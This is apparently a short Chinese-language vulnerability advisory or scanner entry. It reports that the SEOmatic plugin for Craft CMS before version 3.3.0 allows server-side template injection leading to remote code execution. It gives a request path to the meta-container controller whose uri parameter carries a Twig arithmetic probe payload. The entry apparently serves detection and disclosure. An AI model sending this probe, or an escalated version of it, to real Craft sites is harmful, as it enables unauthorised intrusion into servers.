Craft CMS 3.3.0 之前的 SEOmatic 组件允许服务器端模板注入,通过将畸形数据发送到元容器控制器导致 RCE。
/actions/seomatic/meta-container/meta-link-container/?uri={{41646*'40289'}}